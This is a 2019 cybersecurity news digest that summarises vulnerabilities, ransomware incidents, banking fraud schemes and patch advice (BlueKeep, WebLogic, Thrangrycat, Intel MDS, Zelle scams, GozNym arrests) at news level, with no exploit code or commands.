On May 14, 2019, Microsoft released patches for BlueKeep, and described it as a “wormable vulnerability that could self-propagate similarly to how the EternalBlue helped propagate the WannaCry ransomware outbreak.” On Tuesday, July 23, it was announced that Immunity, Inc., was including a working BlueKeep exploit in CANVAS V7.23, the company’s pen-testing toolkit. Microsoft, the US National Security Agency (NSA), Germany’s BSI cybersecurity agency, the Australian Cybersecurity Centre, the US Department of Homeland Security, and the UK’s National Cybersecurity Centre have all issued warnings and alerts that urged users to patch the vulnerability on older versions of Windows. If users have not patched their systems, it is highly encouraged that patches are applied as soon as possible.
On July 16, 2019, iNSYNQ networks were taken offline due to a ransomware attack which left customers of the cloud hosting provider unable to access accounting data. “The attack impacted data belonging to certain iNSYNQ clients, rendering such data inaccessible,” the company said. “As soon as iNSYNQ discovered the attack, iNSYNQ took steps to contain it. This included turning off some servers in the iNSYNQ environment.” With ransomware attacks on the rise, organizations are urged to verify and test preventative and detective controls. It is also important to remember to have a robust response plan in the event of an incident.
Cybercriminals have long been known for using legitimate tools and utilities for malicious activities. Recently, though, it has been observed by Positive Technologies that there has been a substantial increase in the use of “living-off-the-land” tactics. Why? Attackers that use legitimate tools are able to hide their activities in legitimate traffic. “Threat actors increasingly leverage dual-use tools or tools that are already preinstalled on targeted systems to carry out cyberattacks,” said Fortinet. The eight tools that are most commonly abused are: Cobalt Strike and Metasploit Pro, PowerShell, Windows Sysinternals, VNC, Windows Management Instrumentation (WMI), Mimikatz, TeamViewer, Trusted System Executables.
A hacking tool, Koadic, that nation-state hacking teams from Iran, Russia, and China have used to avoid detection was recently updated and has new features that enable attacks to more efficiently spread and persist. The software was released a couple of years ago at DEFCON by the creator, Sean Dillon. Koadic has since received the aforementioned updates that allow it to extract intelligence and information about its targets environment, spread throughout a network, and scrape credentials. “It’s much more efficient now. It can be used to compromise entire networks in a matter of minutes,” said Dillon. The new updates were shown off at Black Hat USA Arsenal in Las Vegas. Due to the capabilities of Koadic, organizations are encouraged to ensure behavior detection methods are enabled.
Ransomware recently hit three managed services providers (MSP) after access was obtained to tools that remotely monitor and manage client systems. The two tools that were used for remote management and ransomware deployment were Webroot and Kaseya. The vendors disclosed that stolen credentials were likely used to access their tools at the MSP locations. What isn't clear, is how the attackers achieved their access to the Webroot console. Kyle Hanslovan with Huntress Labs said, 'We've yet to see anything that would suggest the issue is a global Webroot vulnerability.' John Durant, CTO at Kaseya said, 'We continue to urge customers to employ best practices around securing their credentials, regularly rotating passwords, and strengthening their security hygiene.'
Tavis Ormandy, a researcher at Google, found a vulnerability with Microsoft's 'SymCrypt' that attackers could leverage to perform Denial of Service (DoS). He tested the vulnerability with an X.509 digital certificate that was specially crafted to prevent the completion of the verification process. 'The vulnerability could cause an infinite loop when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric,' Tavis said. There is currently no patch for the vulnerability, but Microsoft has released that the patch will be ready for the July security updates.
Zelle, a popular digital payment service that is embedded in many banking apps is being leveraged by attackers to access funds in personal checking and savings accounts. All it takes for an attacker to gain unauthorized access to a victims account is a spoofed call from the attacker that appears to come from the individual's bank. The victim is social engineered to share the Zelle authorization code with the attacker which then authorizes the attacker's log-in attempt. What makes Zelle so appealing to attackers is the direct access a victims bank account due to it being embedded within banking apps with automatic connection to a user account.
Michael McGuire, a criminology professor at the University of Surrey, posed a buyer on the dark web and discovered organized crime groups that were selling unauthorized network access to financial organizations. The crime group was selling fraudulent web pages, specific to Bank of America, that allow the buyer to phish customers and harvest their data. The toolkit and tutorial were selling for $11. Other companies being targeted include AT&T and Verizon. McGuire said, "if they were not already doing so, corporate cybersecurity teams ought to spend time monitoring the dark web to pick up signs of potential threats, such as data from their organizations already for sale or rogue employees willing to sell network access to others."
Cybersecurity crime in the financial sector is as prominent as it has ever been and continues to grow. Financial institutions are up against cyber-criminals that vary in size and complexity from individuals to nation-states. The methods that these attackers use are increasingly damaging to organizations and are being executed against targets with impeccable timing. Attackers will wait for an organization to launch a new program or service that has not been thoroughly vetted for security and leverage that to gain a position within the victim's environment. As new technologies emerge and banking continues to move into the digital era, it is recommended that institutions always include security at the forefront of initiatives to ensure that all assets under their control are secure.
Law enforcement agencies across six countries have successfully arrested a group of individuals that were responsible for the GozNym Banking malware. The six countries that worked together to bring the group down were Bulgaria, Germany, Georgia, Moldova, Ukraine, and the United States. The GozNym malware, a combination of Gozi ISFB and Nymaim, was used to steal over $100 Million from more than 41,000 victims, predominately in the United States and Europe. Earlier this month, the U.S. Court released that the defendants are being charged with conspiracy to commit computer fraud, conspiracy to commit wire fraud and bank fraud, and conspiracy to commit money laundering.
Relevant URL(s): https://thehackernews.com/2019/05/GozNym-banking-malware.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&_m=3n.009a.1989.nk0ao093p4.18do
Thrangrycat, a new vulnerability has been unveiled for Cisco routers, switches, and firewalls that attackers can leverage to install a persistent backdoor. Thrangrycat has been identified as CVE-2019-1649 and was discovered by researchers at Red Balloon. The vulnerability exists on Cisco products that support the Trust Anchor module (TAm) that is implemented on Cisco enterprise devices. The TAm is used to verify that the firmware operating on the hardware platforms is authentic and unmodified. "By chaining Thrangrycat and remote command injection vulnerabilities, an attacker can remotely and persistently bypass Cisco's secure boot mechanism and lock out all future software updates to the TAm," researchers said. Further details regarding the vulnerability are expected to be released at Black Hat USA this August.
Relevant URL(s): https://thehackernews.com/2019/05/cisco-secure-boot-bypass.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&_m=3n.009a.1986.nk0ao093p4.18av
Earlier this month, researchers released information about a vulnerability in all modern Intel chips to include the chips used by Apple. The new flaw is a speculative execution side-channel vulnerability that could allow an attacker the ability to steal system and user-level secrets from the CPU buffer. If properly executed, disk encryption keys and user passwords could be at risk due to the vulnerability. It is executed through the use of Microarchitectural Data Sampling(MDS), which is a combination of four different flaws. Microcode Updates (MCU) have been released by Intel to fix the MDS vulnerabilities, and users are urged to implement the patches as soon as possible.
Relevant URL(s): https://thehackernews.com/2019/05/intel-processor-vulnerabilities.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&_m=3n.009a.1989.nk0ao093p4.18e0
Financial organizations are having to find a balance between security and usability as they work to maintain and strengthen the trust of consumers. Open banking has created a shift where organizations now have an ecosystem of partners that they also need to ensure are secure. “Security is only as good as the weakest link in the network of ecosystem partners, and the global trend toward open banking is increasing the spiderweb of interconnectivity among banks and third parties — creating additional points of weakness and vulnerability in banks’ network security,” said Alan McIntyre, global head of Accenture’s Banking practice. As open banking continues to grow and evolve, financial organizations are urged to always verify the security of a potential partner before allowing them access to organizational data.
All versions of Oracle Weblogic are vulnerable to a remote code execution flaw. There is currently no CVE number attached to the flaw, but Oracle has been alerted, and it is being tracked by the following identifier: CNVD-C-2019-48814. There are tens of thousands of Weblogic servers across the world with the majority being in the US and China. These servers can be attractive to attackers because they allow them access to resources that they can use for covert crypto-mining. Server administrators are urged to delete wls9_async_response.war, wls-wsat.war and restart the Weblogic service. Another option is to prevent access to the /_async/* and /wls-wsat/* URL paths with access policy control.
Business email compromise (BEC) campaigns have been targeting HR and Finance representatives to alter direct-deposit routings and transfer funds to a throwaway criminal account. BEC attacks are cheap for attackers to use and can yield rapid and lucrative results. The latest trend in BEC attempts is for the attacker to spoof an email from a high-level employee and convince a lesser employee to transfer the funds. The use of spoofing a senior account makes an attempt seem authentic and urgent as they are coming from an authoritative employee. This type of attack can be considered a form of Social Engineering with a successful attack being dependent on the behavior of the victim. Protection from these types of attacks involves the organization having proper policies and technology. It can be summed up with, "If it's possible for someone to request a check to be cut for $5 Million to someone not in the system, you've got a problem." says Phil Reitinger, President and CEO of Global Cyber Alliance.
A recent privilege escalation flaw (CVE-2019-0211) affecting Apache HTTP Server and Unix Systems can be fixed by implementing the latest security update. The flaw allows root privileged code execution to an unprivileged web host user via scripting. Any user permitted to write a script for the Apache web host can gain root access. The proof of concept exploit code has not been released to enable admins ample time to deploy the Apache 2.4.39 security update. Any web hosting providers are urged to apply this fix immediately, and all other Apache admins are advised to apply as soon as possible.
Mobile applications are failing to protect user data because they are lacking necessary security features. A recent research study conducted by Aite Group tested application security by decompiling the apps to their source code. This was the first of many vulnerabilities given that application shielding should prevent unauthorized individuals the ability to decompile and perform their own vulnerability assessment. There are noticeable differences in the applications produced by traditional financial institutions known for their security but lacking the knowledge needed for mobile development, and the newer online financial institutions that lack experience in regulatory requirements but know proper secure development tactics. Nathan Wenzler, Senior Director of Cybersecurity at Moss Adams, is "adamant that a failure to improve mobile financial app security could have huge consequences for banks and financial services companies." Clients are urged to review their DevSecOps to ensure that security is at the forefront of all development practices.
Banks are in a race to develop their digital platforms to make it easier for consumers to adapt to new payment types as well as to compete with emerging financial technology companies. The last couple of years has shown astounding growth and popularity in the use of mobile payment and banking applications. While this digital convergence is helping to streamline consumer experiences, it must align with the goals and regulatory guidance of the financial institution. Risk management needs to be at the forefront of the development and deployment of these mobile banking solutions to ensure company and customer data is secure. The features and capabilities of the technology available today is advancing faster than the resources available to manage and complete the projects. It is recommended that institutions look at mobile development from the same risk perspective that they would any other system deployment, and account for the influx in the data that will need to be monitored.
Polict, a cybersecurity researcher, found a new exploit in PHP that relies on deserialization to 'unpack' malicious code that can be remotely executed. The original flaw was fixed in September of 2018, but Polict found another method using XSS to inject code and initiate the deserialization process. He disclosed the flaw privately to the TCPDF developers in September 2018, and that flaw was fixed within a month. Users of TCPDF are safe as long as they are using version 6.2.22 and above.